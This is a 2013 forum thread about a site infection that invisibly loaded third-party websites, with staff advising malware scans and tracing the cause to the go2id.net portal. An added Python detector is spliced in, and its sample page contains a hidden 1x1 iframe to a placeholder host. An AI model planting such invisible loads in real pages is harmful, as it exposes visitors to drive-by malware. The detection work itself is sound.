
Nomake Wan | Posted: Feb 13 2013, 10:19 AM
ShiMACHaze | Group: Advanced Members | Posts: 19,542 | Member No.: 5,394 | Joined: Feb 5th 2005 | Location: Drydock
Well yeah, but it's...nah, never mind. We're back so I'm gonna make an announcement post. EDIT: Scratch that, I can't.

Anyway, the gist of it is that while IDW was affected by some unscrupulous individuals sending traffic to other countries, there's a chance that all members on Windows PCs have been affected by some payload or another. The actual problem itself was non-malicious--that is, it did not drop a payload, it simply pumped traffic to certain websites. However, those websites themselves may have carried a malware payload. As such I am recommending that all members with Windows PCs who browsed the forum from February 9th until now run a malware scanner on their machine(s).

A quick scan with Malwarebytes Anti-Malware should suffice to let you know if you have nasties on your machine or not. If you do, run a full scan afterward to make sure you nailed it. If you don't want to install something, Panda Antivirus has a good online scanner on their website. There's also Sophos's offline scanner for really nasty bugs (like rootkits), but on top of the fact that I don't think any rootkits were involved with this incident, that scanner has no user-selectable options and will cause problems afterward if used. It's kind of like using a nuclear bomb to kill a cockroach. Sure, it'll work, but the collateral damage will make you wonder if you did the right thing.

Those of you on Mac OS X, Linux or a mobile device would not have been affected.

This post has been edited by Nomake Wan on Feb 13 2013, 10:25 AM
Proud Contributor of IDW Forums and the Music Section Revival Project
Spaz | Posted: Feb 14 2013, 09:12 PM
Just a guy towing a car across the country to chase a dream. | Group: FORUM MODERATOR | Posts: 9,272 | Member No.: 30,193 | Joined: Jul 25th 2008 | Location: Plymouth, MN

Not sure if this is due to a recent database update where info was collected pre-codefix, or if it's new, but here you go:

[Screenshot attached (original size 1360 x 728); not reproduced here.]
Nomake Wan | Posted: Feb 14 2013, 10:12 PM
It says that it was collected 2/14, which would be today. However, that's the main drop website and not the forums, so I have no say in the matter. I haven't visited go2id in over half a decade.

It's entirely possible that something's on go2id though. IDW and WME appear to be clean but I'm not sure if go2id was actually checked.
Spaz | Posted: Feb 15 2013, 05:31 AM
The red banner stays on idforums.net, but goes away once you get deeper.
Nomake Wan | Posted: Feb 15 2013, 07:05 AM
I haven't found any malicious content on the forums themselves, so I'm not sure why it would. What happens if you go to the forums (with the red banner showing) and then press CTRL+F5? Does the banner go away?
Spaz | Posted: Feb 15 2013, 10:53 AM
I can check when I get home from work. Comps are preloaded with IE and we can't install anything.
Spaz | Posted: Feb 15 2013, 03:16 PM
Banner stays. However, if I go directly to the forum, not via the go2id gateway page, the banner does not appear.
kyonpalm | Posted: Feb 15 2013, 03:19 PM
Professional Amateur | Group: ADMINISTRATOR | Posts: 10,566 | Member No.: 30,882 | Joined: Oct 16th 2008 | Location: Laniakea
Sounds to me like there's a bit of code on the main site that still loads extra links invisibly. If I'm not mistaken, whenever you loaded a page on the forums when they were infected, it would also invisibly load this photography website (or maybe it was the Russian one...). Maybe that's what's happening, except on the main site instead of the forums, which are clean. That would explain why loading the forums directly instead of using the portal on the main site solves the problem.
Proud Contributor of the Music Section Revival Project
Nomake Wan | Posted: Feb 15 2013, 04:36 PM
The photography one was only in certain functions--it wasn't built into the forum bits. The Russian one was built into the forum bits. I'll check out go2id with my packet sniffer and see what comes up. Thanks for the report, Spaz.

EDIT: go2id.net is very much being affected by the very same attack that had been leveraged on the forums' functions. As of now Go2ID is not a valid site, but as far as I know there's no way to shut down access to it at this time since it is not actually connected to the forums in any way. All I can say is, stop using Go2ID. The forums themselves are perfectly clean.

This post has been edited by Nomake Wan on Feb 15 2013, 05:00 PM
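The mechanism kyonpalm describes (every page load silently pulling in a third-party site) and the check Nomake Wan ran against go2id.net with a packet sniffer come down to one question about the served HTML: which tags cause the browser to fetch something off-site, and are any of them hidden from the user? The script below is an added example written for this page; it is not code from the forum, from go2id.net, or from any of the people in this thread. The sample page, the hostnames `cdn.example` and `third-party.example`, and the function names are constructed for illustration. Fetch the page with something that does not render it (curl, for instance) and pass the HTML in.

```python
"""Added example (not the forum's or its staff's code): scan a page's HTML for
off-site loads, and flag the hidden ones, which is the pattern described in
this thread (every page load silently pulling in a third-party site).
Hostnames in SAMPLE_PAGE other than go2id.net are constructed placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags whose attribute makes the browser fetch and run/render something.
LOADING_TAGS = {"iframe": "src", "frame": "src", "script": "src",
                "embed": "src", "object": "data"}

# Constructed sample page: one legitimate off-site CDN script, one same-site
# frame, and one 1x1 invisible frame to a placeholder attacker host.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example/jquery.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://third-party.example/in.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<iframe src="https://go2id.net/forum/"></iframe>
</body></html>"""


def _is_hidden(attrs):
    """True if the element is styled or sized so a user would never see it."""
    style = attrs.get("style", "")
    if re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", style, re.I):
        return True
    if re.search(r"(left|top)\s*:\s*-\d+", style, re.I):   # pushed off-screen
        return True
    for dim in ("width", "height"):                        # 0x0 / 1x1 frames
        m = re.match(r"\s*(\d+)", attrs.get(dim, ""))
        if m and int(m.group(1)) <= 1:
            return True
    return False


def _host_of(url):
    """Hostname of an absolute or protocol-relative URL; '' for relative ones."""
    return (urlsplit(url).hostname or "").lower()


class _LoadCollector(HTMLParser):
    """Records every tag that would trigger a fetch, with its source and line."""

    def __init__(self):
        super().__init__()
        self.loads = []

    def handle_starttag(self, tag, attrs):
        src_attr = LOADING_TAGS.get(tag)
        if src_attr is None:
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if src_attr not in a:
            return  # e.g. inline <script> with no src: nothing is fetched
        self.loads.append({"tag": tag, "src": a[src_attr],
                           "hidden": _is_hidden(a), "line": self.getpos()[0]})


def find_offsite_loads(html, site_host, allowed_hosts=()):
    """Return loads whose host is neither the site nor an allowed third party.

    Each finding is a dict with tag, src, host, hidden and line. A hidden
    off-site load is the injection signature; a visible one merely needs review.
    """
    site_host = site_host.lower()
    allowed = {h.lower() for h in allowed_hosts} | {site_host}
    collector = _LoadCollector()
    collector.feed(html)
    findings = []
    for load in collector.loads:
        host = _host_of(load["src"])
        if not host or host in allowed or host.endswith("." + site_host):
            continue  # relative URL, the site itself, or a known-good host
        findings.append({**load, "host": host})
    return findings


def injected_hosts(html, site_host, allowed_hosts=()):
    """Just the hosts pulled in invisibly: the list to block or remove."""
    return sorted({f["host"] for f in find_offsite_loads(html, site_host, allowed_hosts)
                   if f["hidden"]})


if __name__ == "__main__":
    for f in find_offsite_loads(SAMPLE_PAGE, "go2id.net"):
        flag = "HIDDEN off-site load" if f["hidden"] else "visible off-site load"
        print(f"line {f['line']}: <{f['tag']}> {flag} from {f['host']}: {f['src']}")
    print("injected:", injected_hosts(SAMPLE_PAGE, "go2id.net"))
```

Visible off-site loads are reported separately from hidden ones because a CDN script is normal and a 1x1 `visibility:hidden` frame is not; pass the hosts you know the site legitimately uses in `allowed_hosts` so only the surprises remain. The line number tells you where in the served file to look, which is the part that, as the thread says, only someone with access to the files can fix.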
Spaz | Posted: Feb 15 2013, 05:39 PM

You're very welcome. Just passing along what I find.
kyonpalm | Posted: Feb 15 2013, 05:46 PM
Exactly as I predicted.
THE_HONDA_CG2 | Posted: Feb 18 2013, 08:49 PM
Patient Zero | Group: Advanced Members | Posts: 4,279 | Member No.: 37,947 | Joined: Oct 1st 2011

So uh, guys. I don't know what this means, but I think I should bring this to your attention. I've never gotten anything like this before, so um... yeah. What do you make of it?

[Screenshot attached (original size 900 x 506); not reproduced here.]
Nomake Wan | Posted: Feb 19 2013, 12:00 AM
How did you get that? Did you use go2id.net before entering the forums?

This post has been edited by Nomake Wan on Feb 19 2013, 12:00 AM
THE_HONDA_CG2 | Posted: Feb 19 2013, 12:07 AM

I tried checking this thread through this link: http://idforums.net/index.php?showtopic=45369 and that is where I got the warning. It's the AE86 plush doll~ thread.
Nomake Wan | Posted: Feb 19 2013, 12:24 AM
As reported in IRC, the n00b posting in that thread stole his avatar from go2id directly. This is where the warning comes from. Also, the guy is an idiot who not only stole the image but didn't bother to resize it properly or host it on an actual image host. Buckets full of fail. Buckets full of fail everywhere.
Tessou
More NEGATIVE than a black hole | Group: ADMINISTRATOR | Posts: 19,345 | Member No.: 12,263 | Joined: Sep 12th 2005

So... what to do? I'm at the ready to get stuff done.

Edit: nvm, it appears from board logs that Honda already removed the guy's avatar. That leak is plugged, at least.

This post has been edited by Tessou on Feb 19 2013, 08:24 AM
Nomake Wan | Posted: Feb 19 2013, 08:48 AM

It's unfortunate that there's no way to set up a forum-level block of the go2id domain temporarily. I wouldn't even know how to begin doing that, and with what little experience I have messing with IPB I don't think there's a forum-level way to do that. Pretty sure it would only be possible at the VPS. If we had access to that, though, we could just fix go2id instead.
THE_HONDA_CG2 | Posted: Feb 19 2013, 08:50 AM
Yeah Boss, N1 told me in the IRC to go in and take out his avatar. It was a clean job. That was quite an adventure, to say the least. I'll keep an eye out for things like this in the future too.
Tessou

You're all doing a great job of keeping the rest of us informed. A few of us, myself included, are not seeing these errors or malware alerts in any shape or form.
HorizontalMitsubishi | Posted: Feb 19 2013, 03:36 PM
Part of the Tessou Signature Series | Group: Advanced Members | Posts: 2,439 | Member No.: 2,022 | Joined: Jun 16th 2004 | Location: Torrance California

I'm not seeing any alert on idforums.net, but go2id.net is still throwing errors in Google, Firefox and Chrome. So after taking literally a 30-second look at go2id.net, here is what I found.

But as I've said, if you need help with the clean up, you know where to find me.

This post has been edited by HorizontalMitsubishi on Feb 19 2013, 03:55 PM
Nomake Wan | Posted: Feb 19 2013, 03:56 PM

idforums.net was only showing an alert for the thread Honda mentioned because a user in that thread was stealing his avatar from go2id.net, which has the alert. The infection vector, content and disinfection method have been known this whole time--as you displayed, those are the very same infections that had been on idforums.net in the past. As such, ridding the domain of those problems is not a matter of expertise but rather one of access. Perry is the only person who can do it because he's the only one with access to those files to make changes. Perry isn't here. As soon as he's back he can fix the whole domain in one swoop in all of five seconds, just as he did with idforums.net.

This post has been edited by Nomake Wan on Feb 19 2013, 03:57 PM